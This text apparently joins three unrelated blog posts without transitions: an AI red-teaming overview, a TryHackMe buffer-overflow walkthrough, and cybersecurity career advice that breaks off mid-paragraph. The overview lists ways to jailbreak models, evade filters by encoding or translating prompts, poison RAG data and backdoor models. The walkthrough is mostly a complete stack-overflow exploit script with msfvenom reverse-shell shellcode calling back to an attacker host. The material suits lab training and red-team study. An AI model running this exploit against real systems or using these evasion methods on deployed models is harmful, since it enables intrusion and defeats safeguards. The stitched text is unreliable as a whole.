ML Model Access : We can access the API interface which provide results from ML model to Gen AI or try accessing into ML model service providers like AWS SageMaker, Google Cloud Vertex AI, Microsoft Azure ML, IBM Watson, OCI AI Services.

Execution : Execute the malicious ML artifacts or say use exploit the vulnerability in ML model, supply chain, configuration or it’s API. Execute the malicious prompt or script also we can compromise the LLM plugin.

Persistence : To make our access persistent we may craft backdoor in ML Model itself, execute the self replicating prompt injection or we can poison the RAG or Dataset used for Gen AI Model.

Privilege Escalation : To escalate privilege we have to jailbreak the model and go beyond manufacture restriction and get admin or developer rights/access. Other case is we compromise LLM plugin and which define what data will be presented or what will be final outcome/decision.That enables us to manipulate the output and behaviour of model.

Defense Evasion: There might be some defensive mechanism implemented in some model we need to evade it with different approaches.

• Obfuscation of Prompt by breaking it into multiple instructions(multiton prompt),

• Giving prompt in different languages like Hindi, Spanish, Mandarin, Arabic and later translating output.

• Changing format of prompt like sending it in base 64, URL encoding, MD5 Hash.

• Scenario based fine tuning or fine tuning with instructions.

• RAG model Injection with false information, user links and knowledge injection or via prompt manipulation for injecting false Entries into RAG.

Other is LLM Jailbreak and LLM output component like API or plugin manipulation.

Credentials Access : During the process till now we might have created or identified any unsecured or guessable credentials to access model, dataset or services.

Discovery : Once we get access into model or service we try to identify family of ML model, get model system information, ML artifacts, model ontology and check for hallucination of LLM and AI model Output.

Collection : After discovery collect data from repositories, data from local system, ML artifact collections.

ML Attack Staging : Create proxy model(we can use service like ollama). Craft malicious data and backdoor into the ML model and verify attack.

Exfiltration : Exfiltrate data via ML interface APIs, output of system LLM prompt, LLM Data and other system details.

Impact : Denial of Service of ML Model, Evading and spamming ML model, impact of integrity of dataset and ML model.

And This is the brief of MITRE ATLAS Framwork and it’s technique for execution Red Teaming AI models.

OWASP Top 10 for Gen AI and LLM

Lets look at OWASP Top 10 for Gen AI and LLM which list out most found vulnerabilities on Gen AI and LLM Models

Prompt Injection : Prompt Injection Vulnerability occurs when an attacker manipulates a large language model (LLM) through crafted inputs, causing the LLM to unknowingly execute the attacker’s intentions.

Sensitive Information Disclosure : Sensitive information can affect both the LLM and its application context. This includes personal identifiable information (PII), financial details, health records, confidential business data, security credentials, and legal documents.

Supply Chain : LLM supply chains are susceptible to various vulnerabilities, which can affect the integrity of training data, models, and deployment platforms. These risks can result in biased outputs, security breaches, or system failures.

Data and Model Poisoning : Data poisoning occurs when pre-training, fine-tuning, or embedding data is manipulated to introduce vulnerabilities, backdoors, or biases. This manipulation can compromise model security, performance, or ethical behavior, leading to harmful outputs or impaired capabilities.

Improper Output Handling : Improper Output Handling refers specifically to insufficient validation, sanitization, and handling of the outputs generated by large language models before they are passed downstream to other components and systems.

Since LLM-generated content can be controlled by prompt input, this behaviour is similar to providing users indirect access to additional functionality.

Excessive Agency : An LLM-based system is often granted a degree of agency by its developer ;  the ability to call functions or interface with other systems via extensions (sometimes referred to as tools, skills or plugins by different vendors) to undertake actions in response to a prompt.

The decision over which extension to invoke may also be delegated to an LLM ‘agent’ to dynamically determine based on input prompt or LLM output. Agent-based systems will typically make repeated calls to an LLM using output from previous invocations to ground and direct subsequent invocations.

System Prompt Leakage :The system prompt leakage vulnerability in LLMs refers to the risk that the system prompts or instructions used to steer the behavior of the model can also contain sensitive information that was not intended to be discovered.

System prompts are designed to guide the model’s output based on the requirements of the application, but may inadvertently contain secrets. When discovered, this information can be used to facilitate other attacks.

Vector and Embedding Weaknesses : Vectors and embeddings vulnerabilities present significant security risks in systems utilising Retrieval Augmented Generation (RAG) with Large Language Models (LLMs).

Weaknesses in how vectors and embeddings are generated, stored, or retrieved can be exploited by malicious actions (intentional or unintentional) to inject harmful content, manipulate model outputs, or access sensitive information.

Misinformation : Misinformation from LLMs poses a core vulnerability for applications relying on these models. Misinformation occurs when LLMs produce false or misleading information that appears credible. This vulnerability can lead to security breaches, reputational damage, and legal liability.

Unbounded Consumption : Unbounded Consumption refers to the process where a Large Language Model (LLM) generates outputs based on input queries or prompts. Inference is a critical function of LLMs, involving the application of learned patterns and knowledge to produce relevant responses or predictions.

Vulnerabilties to focus during Red Teamig LLM

• Prompt Injection: Tricking the model into breaking its rules or leaking sensitive information.

• Bias and Toxicity: Generating harmful, offensive or unfair outputs.

• Data Leakage: Extracting private information or intellectual property from the model.

• Data Poisoning: Manipulating the training data that a model learns from to cause it to behave in undesirable ways.

• Hallucinations: The model confidently provides false information.

• Agentic Vulnerabilities: Complex attacks on AI “agents” that combine multiple tools and decision making steps.

• Supply Chain Risks: Risks that stem from the complex, interconnected processes and interdependencies that contribute to the creation, maintenance, and use of models.

• Jailbreaking: Jailbreaking is the process of utilizing specific prompt structures,input patterns,or contextual cues to bypass the built-in restrictions or safety measures of LLMs.

• DAN (Do anything) Jailbreak prompts

• DeepTeam (The LLM Red Teaming open-source Framework)

• Harm Bench (A Standardized Evaluation Framework for Automated Red Teaming)

• Play Ground

• Challange : Immersive GPT

Framework, Standards and Laws for AI

Framework

• Responsible AI (RAI): focuses on developing and deploying AI systems that are ethical, transparent, and aligned with human values, prioritizing fairness, accountability, and respect for privacy.

• Google’s Secure AI Framework (SAIF) : Google’s SAIF is a conceptual framework designed to help organizations build and deploy secure AI systems

• NIST AI RISK MANAGEMENT FRAMEWORK(RMF) : The NIST AI Risk Management Framework (AI RMF) is a guide designed to help organizations manage AI risks at every stage of the AI lifecycle  - from development to deployment and even decommissioning.

Guidance : Playbook

Standards

• ISO/IEC 42001:2023: AI security and management which provides a framework for organizations to manage AI responsibly and ethically.

• ISO/IEC TR 27563:2023 is a technical report that provides best practices for assessing security and privacy in artificial intelligence (AI) use cases.

• ISO/IEC DIS 27090: Guidance for addressing security threats to artificial intelligence systems.

AI Related Acts

• The European Union’s AI Act

• Artificial Intelligence & Data Act (AIDA),Canada

• Singapore’s Model AI Governance Framework

AI Security Solution

Content Filters : AI content filters are systems designed to detect and prevent harmful or inappropriate content.

They work by evaluating input prompts and output completions, using neural classification models to identify specific categories such as hate speech, sexual content, violence, and self-harm e.g., in Azure AI Foundry, Vertex AI.

Data security posture management (DSPM): DSPM identifies sensitive data across cloud and services, it continuously monitors data security, identifies risks, assesses vulnerabilities and provides remediation strategies.

Meta prompt : A meta prompt, or system message, is a set of natural language instructions used to guide an AI system’s behavior (do this, not that). A good meta prompt would say “if a user requests large quantities of content, only return a summary of those search results.

Guardrails : Guardrails are mechanisms and frameworks designed to ensure that AI systems operate within ethical, legal, and technical boundaries.They prevent AI from causing harm, making biased decisions, or being misused.

LLM Guard: The Digital Firewall for Language Models, By offering sanitization, detection of harmful language, prevention of data leakage, and resistance against prompt injection attacks.

MCP Scan : Security scanner for Model Context Protocol (MCP) servers. Scan for common vulnerabilities and ensure your data and agents are safe.

Now I will end the blog with thanking you all and the final message which inspire all of us to learn more about Artificial Intelligence.

Feel free to reach me out over linkedin or X and stay tuned for more blogs on AI,Web3 seurity and cybersecurity Blogs on medium.

AI won’t replace humans, but humans using AI will  — Fei Fei Li

About The Labs

This is an amazing room created by Tib3rius that includes everything you need if you are preparing for the OSCP and eCPPT certification exams.

I will try to make it as easy as possible. It might be a bit lengthy, but I will cover all the do's and don'ts.

Note: We will not use the TryHackMe guide, as I find it a little difficult for beginners.

Lab Requirements

1. Windows 7 Machine (with Immunity Debugger installed)

2. Kali Linux Machine

In these labs, we are using a TryHackMe machine that is pre-configured with the above requirements, so let's get started.

The command to connect to the machine and access the full screen is as follows:

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.70.85 /workarea

Once connected, if prompted for network selection, choose Home Network.

Windows Victim Machine

As we can see, this machine has a vulnerable application and Immunity Debugger preconfigured. In the vulnerable folder, there is an executable named oscp that we are going to use. Let's find out what this oscp.exe does.

oscp.exe is listening on port 1337. From our attacker machine, we can try to connect using nc.

Run this command from the attacker's terminal.

nc 10.10.70.85 1337

What happened on the victim machine?

The example above shows the general case, which is the ideal functionality.

Test Case 1

From the attacker machine, we will try to send something much larger than test_akbar.

Where did this idea come from? Since we are working on the buffer overflow room, our goal is to overflow the buffer. This means we will send a large amount of data, which might cause the application to crash.

To send a large amount of data, I plan to use Python to generate A*1000 and then send it.

First, we sent 1000 A's, but the application was able to respond with OVERFLOW1 COMPLETED.

Now, we are increasing the number of A's from 1000 to 2000 to see what happens.

>>> print("A"*2000)

Now, check the application's response.

The application crashed, revealing a buffer overflow vulnerability.

In some cases, you might receive an error called a segmentation fault. This means you are trying to access a part of memory that you are not allowed to access.

oscp.exe crashed

Test Case 2

Now, we will write a Python script to automate this process. There are some scripts available in the TryHackMe room for crashing or controlling the EIP, but we won't be using those.

Below is script2.py. You can name the script as whatever you like.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b"A" * 2000]  # as we are using python3 we need to mention the strings in bytes
    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

Let's run this script without starting oscp.exe to see if it's working correctly. We should get an error.

There is one issue in our script, and this is an intentional issue that you might encounter. We are directly sending our payload without using the valid command. In this lab, our command is:

So, we need to specify OVERFLOW1 in our script, followed by a space and our value, as shown below.

OVERFLOW1 [value]

Re-editing the script.

The part marked in bold was causing the problem

#!/usr/bin/env python3
import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b'OVERFLOW1 ' + b'A' * 2000]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function.
    s.send(payload)
    s.close()
except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

Now, let's start oscp.exe and run the script.

Make sure oscp.exe is running before you execute the script.

Now check the application.

It crashed, which means our script is working perfectly.

SUPER COOL!

Test Case 3

Here, I am going to use Immunity Debugger because I need to check some registers and other details to get a reverse shell from this machine.

Let's start Immunity Debugger now.

Once open, you have two methods to find the executable: 1) to run the executable and attach it, 2) directly open the .exe file.

It is recommended to open the .exe file directly.

Once open it will be in paused state.

As show below we need to run this and it should be in running state.

Now we are running.

So what we are going to do is we will run our script2.py and see in my immunity debugger.

The application should crash and be the immunity debugger will be moved to Paused again.

Observe the CPU Registers

41414141 is the hexadecimal representation of the characters AAAAAAA.

The most important pointer to note below is EIP, which is overwritten as 414141.

This means that due to overflow, our AAAAA's are crossing EIP and entering ESP, as shown below.

So now, what we are interested in is gaining complete control over the EIP. EIP is the instruction pointer that will try to execute the next line of code.

Challenge here

We need to find the exact offset index of this EIP so that we can take full control of it. But our problem is that we sent 2000 A's, so there is no way to figure out exactly where the EIP starts—whether it's at 1500, 1600, 1700, or any value in between. We can't just assume it.

What we know is that we sent 2000 A's, and they are affecting the EIP. To solve this, we will use a cyclic pattern. The cyclic pattern will help us quickly determine the exact point where our A's are affecting the EIP.

We will create a pattern of 2000 characters. This pattern will pass over the EIP values, and by checking the EIP, we can identify the exact pattern where our EIP starts.

msf-pattern_create -l 2000

Now let's copy this pattern into our payload.

Remove A*2000 from script2.py and paste the pattern above.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b'OVERFLOW1 ' + b'pattern']  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function
    s.send(payload)
    s.close()
except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

How it actually looks.

Save this, restart the Immunity Debugger, and run oscp.exe.

Then, run script2.py.

Again, the application will crash, but now we can identify the EIP value.

EIP 6F43396E is a unique number, and using this number, we can find the index/offset where it is getting overwritten on the EIP.

To find the pattern where the EIP is overwritten with the value 6F43396E, we will use another tool called msf-pattern-offset.

msf-pattern_offset -l 2000 -q 6F43396E

So now we have found the exact match. This indicates that the EIP starts at 1978. Whatever we write after 1978 will overwrite the EIP.

Re-edit script2.py

In the script below, the B character will overwrite the EIP.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'B' * 4]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function
    s.send(payload)
    s.close()
except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

Save this, restart the Immunity Debugger, and run oscp.exe.

Run script2.py.

The application crashed.

Now, my EIP is overwritten to 42424242, which is the hexadecimal conversion of the character B.

Let see If we send something after B where it goes.

Re-edit script2.py

We have added C char 100 times.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes

    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'B' * 4 + b'C' * 100]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

EIP contains 42424242, which represents the character B.

EAX contains our AAAAA.

In ESP, I have the C character. This is crucial to know because this is where I plan to insert malicious code.

Now we have control over ESP as well.

What if I make EIP jump or tell EIP to go to ESP? It will go to ESP, and if I replace the C character with my malicious shell code, EIP will execute that code.

That's the main goal we are working towards.

If you've followed along this far, congratulations!

Malicious Task

To perform the jumping task, we need to use a Python script called Mona.

Since we are using a TryHackMe machine, it is already installed in the Immunity Debugger.

But let's see where you can get it and where to place it.

GitHub — corelan/mona: Corelan Repository for mona.py

Download the mona.py script and move it to the Immunity Debugger's Python folder.

Move mona.py here.

to invoke mona

!mona

we are going to use this jump command to jump from EIP to ESP.

!mona jmp -r esp

Here, your Mona terminal will be activated again. Type !mona to check the status.

We have found a total of 9 pointers. You can choose any one of them, but I will choose the one that has all FALSE. We are using the first one: 0x625011af.

Now, the problem here is that whenever I use this address, I need to convert it to little-endian format.

Don't worry, we'll learn how.

My address was 0x625011af.

The easiest way is to reverse it and add \x before each pair of characters, as shown below.

\xaf\x11\x50\x62

Edit the script2.py and paste this little-endian value in place of B.

#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 bytes

    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'\xaf\x11\x50\x62' + b'C' * 100]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things, so we will join this using the join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

The reason we're doing this is that this is the jump address, and I want to jump to this address and enter the C buffer where I'll upload the malicious code.

We will also set a breakpoint. I'm setting this so that whenever the value 0x625011af appears, it stops right there.

Click on the assemble and disassemble box and press CTRL+G.

The ESP jmp instruction is set to FFE4

Now our breakpoint is set.

Run script2.py

Check the Immunity Debugger.

Now the EIP is set to 625011AF, which is the jump instruction. The jump is over ESP, and now we will create malicious code and paste it in 'C'.

There is one major character issue that you will encounter, which I will explain further.

Let's create a malicious payload.

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.48.237 LPORT=2306 -f py

We get shellcode that provides a buf variable. All of this is in bytes, but the problem is that the shellcode contains some bad characters that are not allowed in the vulnerable program.

If any bad character is used, we will not get a reverse shell.

Find Bad Characters

Identify the bad characters and remove them from our payload.

Search online to find out what bad characters are.

https://github.com/cytopia/badchars

copy this bad char in our script2.py but before running pad b as they are not in bytes.

badchars=(
 “\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10””\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"”\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"”\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"”\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"”\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"”\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"”\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"”\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"”\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"”\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"”\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"”\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"”\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"”\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"”\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff”)

Paste the above characters in script.

#!/usr/bin/env python3

import socket
import sys

badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)  # This will find bad characters

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 bytes

    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'\xaf\x11\x50\x62' + badchars]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things, so we will join this using the join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

Run the script2.py

Check immunity debugger.

Follow in dump

Now we need to check the hex dump and find the bad characters.

As highlighted below, the actual sequence is 05 06, so it should be 07 08, but it is 0A and 0D.

Therefore, 07 and 08 are bad characters.

Again found

2C 2D, ideally it should be 2E 2F, but it's 0A, which means

2E and 2F are bad characters.

We found these many bad characters.

\x07\x08\x2e\x2f\xa0\xa1\x00

Now Again generate the payload excluding this bad characters.

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.48.237 LPORT=2306 -f py -b “\x07\x08\x2e\x2f\xa0\xa1\x00”

New Payload which doesn’t have the bad characters.

Remove the bad characters and paste this in script2.py

buf = b""
buf += b"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x6e\x97\x03\xdf\x83\xee\xfc\xe2\xf4"
buf += b"\x92\x7f\x81\xdf\x6e\x97\x63\x56\x8b\xa6\xc3\xbb"
buf += b"\xe5\xc7\x33\x54\x3c\x9b\x88\x8d\x7a\x1c\x71\xf7"
buf += b"\x61\x20\x49\xf9\x5f\x68\xaf\xe3\x0f\xeb\x01\xf3"
buf += b"\x4e\x56\xcc\xd2\x6f\x50\xe1\x2d\x3c\xc0\x88\x8d"
buf += b"\x7e\x1c\x49\xe3\xe5\xdb\x12\xa7\x8d\xdf\x02\x0e"
buf += b"\x3f\x1c\x5a\xff\x6f\x44\x88\x96\x76\x74\x39\x96"
buf += b"\xe5\xa3\x88\xde\xb8\xa6\xfc\x73\xaf\x58\x0e\xde"
buf += b"\xa9\xaf\xe3\xaa\x98\x94\x7e\x27\x55\xea\x27\xaa"
buf += b"\x8a\xcf\x88\x87\x4a\x96\xd0\xb9\xe5\x9b\x48\x54"
buf += b"\x36\x8b\x02\x0c\xe5\x93\x88\xde\xbe\x1e\x47\xfb"
buf += b"\x4a\xcc\x58\xbe\x37\xcd\x52\x20\x8e\xc8\x5c\x85"
buf += b"\xe5\x85\xe8\x52\x33\xff\x30\xed\x6e\x97\x6b\xa8"
buf += b"\x1d\xa5\x5c\x8b\x06\xdb\x74\xf9\x69\x68\xd6\x67"
buf += b"\xfe\x96\x03\xdf\x47\x53\x57\x8f\x06\xbe\x83\xb4"
buf += b"\x6e\x68\xd6\x8f\x3e\xc7\x53\x9f\x3e\xd7\x53\xb7"
buf += b"\x84\x98\xdc\x3f\x91\x42\x94\xb5\x6b\xff\x09\xd4"
buf += b"\x5e\x7a\x6b\xdd\x6e\x9e\x01\x56\x88\xfd\x13\x89"
buf += b"\x39\xff\x9a\x7a\x1a\xf6\xfc\x0a\xeb\x57\x77\xd3"
buf += b"\x91\xd9\x0b\xaa\x82\xff\xf3\x6a\xcc\xc1\xfc\x0a"
buf += b"\x06\xf4\x6e\xbb\x6e\x1e\xe0\x88\x39\xc0\x32\x29"
buf += b"\x04\x85\x5a\x89\x8c\x6a\x65\x18\x2a\xb3\x3f\xde"
buf += b"\x6f\x1a\x47\xfb\x7e\x51\x03\x9b\x3a\xc7\x55\x89"
buf += b"\x38\xd1\x55\x91\x38\xc1\x50\x89\x06\xee\xcf\xe0"
buf += b"\xe8\x68\xd6\x56\x8e\xd9\x55\x99\x91\xa7\x6b\xd7"
buf += b"\xe9\x8a\x63\x20\xbb\x2c\xf3\x6a\xcc\xc1\x6b\x79"
buf += b"\xfb\x2a\x9e\x20\xbb\xab\x05\xa3\x64\x17\xf8\x3f"
buf += b"\x1b\x92\xb8\x98\x7d\xe5\x6c\xb5\x6e\xc4\xfc\x0a"

Now the script is

#!/usr/bin/env python3

import socket
import sys

# Bad characters
buf = b""

buf += b"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x6e\x97\x03\xdf\x83\xee\xfc\xe2\xf4"
buf += b"\x92\x7f\x81\xdf\x6e\x97\x63\x56\x8b\xa6\xc3\xbb"
buf += b"\xe5\xc7\x33\x54\x3c\x9b\x88\x8d\x7a\x1c\x71\xf7"
buf += b"\x61\x20\x49\xf9\x5f\x68\xaf\xe3\x0f\xeb\x01\xf3"
buf += b"\x4e\x56\xcc\xd2\x6f\x50\xe1\x2d\x3c\xc0\x88\x8d"
buf += b"\x7e\x1c\x49\xe3\xe5\xdb\x12\xa7\x8d\xdf\x02\x0e"
buf += b"\x3f\x1c\x5a\xff\x6f\x44\x88\x96\x76\x74\x39\x96"
buf += b"\xe5\xa3\x88\xde\xb8\xa6\xfc\x73\xaf\x58\x0e\xde"
buf += b"\xa9\xaf\xe3\xaa\x98\x94\x7e\x27\x55\xea\x27\xaa"
buf += b"\x8a\xcf\x88\x87\x4a\x96\xd0\xb9\xe5\x9b\x48\x54"
buf += b"\x36\x8b\x02\x0c\xe5\x93\x88\xde\xbe\x1e\x47\xfb"
buf += b"\x4a\xcc\x58\xbe\x37\xcd\x52\x20\x8e\xc8\x5c\x85"
buf += b"\xe5\x85\xe8\x52\x33\xff\x30\xed\x6e\x97\x6b\xa8"
buf += b"\x1d\xa5\x5c\x8b\x06\xdb\x74\xf9\x69\x68\xd6\x67"
buf += b"\xfe\x96\x03\xdf\x47\x53\x57\x8f\x06\xbe\x83\xb4"
buf += b"\x6e\x68\xd6\x8f\x3e\xc7\x53\x9f\x3e\xd7\x53\xb7"
buf += b"\x84\x98\xdc\x3f\x91\x42\x94\xb5\x6b\xff\x09\xd4"
buf += b"\x5e\x7a\x6b\xdd\x6e\x9e\x01\x56\x88\xfd\x13\x89"
buf += b"\x39\xff\x9a\x7a\x1a\xf6\xfc\x0a\xeb\x57\x77\xd3"
buf += b"\x91\xd9\x0b\xaa\x82\xff\xf3\x6a\xcc\xc1\xfc\x0a"
buf += b"\x06\xf4\x6e\xbb\x6e\x1e\xe0\x88\x39\xc0\x32\x29"
buf += b"\x04\x85\x5a\x89\x8c\x6a\x65\x18\x2a\xb3\x3f\xde"
buf += b"\x6f\x1a\x47\xfb\x7e\x51\x03\x9b\x3a\xc7\x55\x89"
buf += b"\x38\xd1\x55\x91\x38\xc1\x50\x89\x06\xee\xcf\xe0"
buf += b"\xe8\x68\xd6\x56\x8e\xd9\x55\x99\x91\xa7\x6b\xd7"
buf += b"\xe9\x8a\x63\x20\xbb\x2c\xf3\x6a\xcc\xc1\x6b\x79"
buf += b"\xfb\x2a\x9e\x20\xbb\xab\x05\xa3\x64\x17\xf8\x3f"
buf += b"\x1b\x92\xb8\x98\x7d\xe5\x6c\xb5\x6e\xc4\xfc\x0a"

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 bytes

    # Payload including padding (NOP sled) and the buffer of bad characters
    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'\xaf\x11\x50\x62' + b'\x90' * 16 + buf]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things, so we will join this using the join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()

One last thing we need to add is a NOP sled \x90. It is placed between the jump and the payload. We need some space between the jump and the payload to get the reverse shell, so we add \x90 for padding.

Now, we don't need the immunity debugger. I found my bad character and my jump address, so I will run the program and execute our script.

Running oscp.exe.

Listener in place.

Run the script2.py for the last time.

BOOOOMMMMMMM!!!!!!!!!!!!!!!!!!!!!!!!

And we got the shell.

Thank you for reading this blog. While attempting this challenge, I learned many things. This was a unique target with a unique vulnerability.

In the cybersecurity domain, jobs are categorized into teams based on their responsibilities. Depending on which team you work with, your duties may vary. These teams are:

• Red Team: This team is responsible for attacking into (hacking) the organization. We call them the attackers. Their job is to simulate real-world attacks by identifying paths that a potential attacker could use to compromise the organization.

• Blue Team: This team is responsible for protecting (defending) the organization. We call them the defenders. Their role is to safeguard the organization from external threat actors (malicious hackers).

• White Team: This team is responsible for assessing (inspecting) the organization's security posture. We call them auditors. Their job is to inspect the systems, networks, and other security controls used by the organization.

In cybersecurity, job opportunities are limited. Despite what you might hear online, be aware that the number of positions is restricted, especially for red team roles such as penetration testers or red teamers. The majority of openings in the cybersecurity domain are for blue team roles, like Junior SOC Analysts or SOC L1 positions. There are even fewer roles available for white team positions, such as ISO Auditors.

This blog will be divided into two sections:

• Getting a job as a fresher

• Getting a job as an experienced professional

Getting job as a fresher

Freshers’ Dilemma: Breaking Into Cybersecurity

The cybersecurity job market is tough for freshers—and that’s a fact! Most entry-level roles require some form of work experience in domains like Helpdesk/IT Support, Web Development, or Network/System Administration.

Now, the question is, how do you get a job as a fresher? Isn’t it impossible since recruiters are looking for experienced professionals, even for entry-level roles? Is it a lost cause? Not at all! You can still get a job as a fresher, but you'll have to hustle a bit more than the seasoned pros. Keep this mantra in mind: "Having work experience doesn’t necessarily mean having knowledge." I might have one year of work experience, but I still might not know how to install Python. You’ll encounter situations like this often, especially in the Indian corporate world, where there’s a tendency to exaggerate skills on resume.

The best way to compete with working professionals is by showcasing your deep understanding of concepts in your domain and your ability to learn new concepts quickly across various fields.

Additionally, you may come across situations where a large number of applicants apply for junior or intern roles in cybersecurity. It can feel overwhelming to see such numbers, and you might lose hope of being selected. But don't worry - most applicants lack a fundamental understanding of cybersecurity. Many individuals applied simply because online influencers promoted the notion of abundant job opportunities in the field..

Recruiter’s Dilemma: Hiring the Right Talent

Before attempting to hack anything, it’s essential to study the entire product, understand its functionality, and learn how it works. Similarly, before "hacking" your way into landing a job, let's first understand the mindset of a recruiter.

As a recruiter, imagine I’ve posted a job opening for an entry-level role in cybersecurity, outlining the roles and responsibilities. Within a few hours, I received over 400 applications for the position.

